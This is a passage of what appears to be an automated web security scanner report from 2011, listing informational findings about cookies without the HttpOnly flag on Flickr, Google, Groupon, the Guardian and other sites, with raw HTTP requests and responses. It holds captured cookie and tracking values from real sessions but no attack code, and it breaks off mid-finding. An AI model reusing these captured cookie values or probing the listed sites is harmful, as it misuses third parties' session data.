Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com
X-Served-By: www29.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-03-29 14.38.40 | Flickr
...[SNIP]...

14.750. http://www.flickr.com/photos/favoritltd/4796024690/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4796024690/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4796024690/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:55 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com
X-Served-By: www65.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-04-13 10.21.19 | Flickr
...[SNIP]...

14.751. http://www.google.com/calendar/embed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /calendar/embed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • S=calendar=PGTAzruPpZC0T4p7k1s-Zg;Expires=Tue, 24-Jan-2012 16:39:42 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /calendar/embed HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: S=calendar=PGTAzruPpZC0T4p7k1s-Zg;Expires=Tue, 24-Jan-2012 16:39:42 GMT
Location: https://www.google.com/calendar/embed?gsessionid=OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:39:42 GMT
Expires: Mon, 24 Jan 2011 16:39:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/calendar/embed?gsession
...[SNIP]...

14.752. http://www.google.com/calendar/event

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /calendar/event

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • S=calendar=2FKjWxdqCI7F35QmTmNAaA;Expires=Tue, 24-Jan-2012 16:39:44 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /calendar/event?eid=NjY3N2VndjJhM24xbDE0NDQ5cDJ0ZXNwc29fMjAwOTA1MTlUMTgwMDAwWiBqdWdjYWxlbmRhckBvcGVuc291cmNlbWF0dGVycy5vcmc HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: S=calendar=2FKjWxdqCI7F35QmTmNAaA;Expires=Tue, 24-Jan-2012 16:39:44 GMT
Location: https://www.google.com/calendar/event?eid=NjY3N2VndjJhM24xbDE0NDQ5cDJ0ZXNwc29fMjAwOTA1MTlUMTgwMDAwWiBqdWdjYWxlbmRhckBvcGVuc291cmNlbWF0dGVycy5vcmc&gsessionid=OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:39:44 GMT
Expires: Mon, 24 Jan 2011 16:39:44 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/calendar/event?eid=NjY3
...[SNIP]...

14.753. http://www.google.com/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance?hl=en&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Mon, 24 Jan 2011 16:39:58 GMT
Expires: Mon, 24 Jan 2011 16:39:58 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

14.754. http://www.google.com/setprefs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /setprefs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1295887187:GM=1:SG=2:S=vEi-6deBjxzySk34; expires=Wed, 23-Jan-2013 16:39:47 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1295887187:GM=1:SG=2:S=vEi-6deBjxzySk34; expires=Wed, 23-Jan-2013 16:39:47 GMT; path=/; domain=.google.com
Date: Mon, 24 Jan 2011 16:39:47 GMT
Server: gws
Content-Length: 219
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>
...[SNIP]...

14.755. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295887203:GM=1:IG=3:S=iMFWRuisrzY4aBh2; expires=Wed, 23-Jan-2013 16:40:03 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /url?sa=p&pref=ig&pval=3&q=http://www.google.com/ig%3Fhl%3Den%26source%3Diglk&usg=AFQjCNFA18XPfgb7dKnXfKz7x7g1GDH1tg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/ig?hl=en&source=iglk
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295887203:GM=1:IG=3:S=iMFWRuisrzY4aBh2; expires=Wed, 23-Jan-2013 16:40:03 GMT; path=/; domain=.google.com
Date: Mon, 24 Jan 2011 16:40:03 GMT
Server: gws
Content-Length: 243
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/ig?hl=en&a
...[SNIP]...

14.756. https://www.google.com/accounts/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • GALX=adTYhQttweA;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=adTYhQttweA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:44:39 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

14.757. https://www.google.com/accounts/ServiceLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • GALX=UyGwfUaxON0;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=UyGwfUaxON0;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:45:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10829
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

14.758. http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goozernation.com
Path:   /video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 75a2a69c945fc9bbaf3897f5bc47b14f=dp2ff9jkt3mlta9rvo5qn02g00; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq HTTP/1.1
Host: www.goozernation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 75a2a69c945fc9bbaf3897f5bc47b14f=dp2ff9jkt3mlta9rvo5qn02g00; path=/
Last-Modified: Tue, 25 Jan 2011 05:05:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.759. http://www.greenmaven.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenmaven.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 979fda0e3f6e7c8e8a6a222280b2695d=bfb4s1od493fairspf4tr05d04; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.greenmaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:08 GMT
Server: Apache/1.3.41 (Unix) mod_fastcgi/2.4.2 mod_scgi/1.12 PHP/5.2.14 mod_psoft_traffic/0.2 mod_ssl/2.8.31 OpenSSL/0.9.8b mod_macro/1.1.2
X-Powered-By: PHP/5.2.14
Set-Cookie: 979fda0e3f6e7c8e8a6a222280b2695d=bfb4s1od493fairspf4tr05d04; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:45:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.760. http://www.groupon.com/washington-dc/subscribe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /washington-dc/subscribe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
  • adchemy_id=Explorer; path=/
  • _tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
  • division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
  • area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
  • b=525bb898-283d-11e0-a3b5-005056957e9b; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
  • s=525bc5ae-283d-11e0-a3b5-005056957e9b; path=/
  • opt_default=7980234323; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /washington-dc/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Explorer&d=District_of_Columbia_-_Washington&p=joomlacode.org&a=Text/ HTTP/1.1
Host: www.groupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 04:41:06 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: adchemy_id=Explorer; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: _tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: b=525bb898-283d-11e0-a3b5-005056957e9b; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: s=525bc5ae-283d-11e0-a3b5-005056957e9b; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: opt_default=7980234323; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
Set-Cookie: opt_7980234323_v=0; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
Set-Cookie: visited=true; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: _thepoint=e54b532010193ffb80929de47a093240; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:06 GMT; HttpOnly
Status: 200
ETag: "cc98647c2c5c60b56a748ca5db959984"
X-S-COOKIE: 525bc5ae-283d-11e0-a3b5-005056957e9b
X-B-COOKIE: 525bb898-283d-11e0-a3b5-005056957e9b
X-Runtime: 72
Content-Length: 24855
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...

14.761. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
  • GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x22 HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:10 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 07
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

14.762. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
  • GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:09 GMT
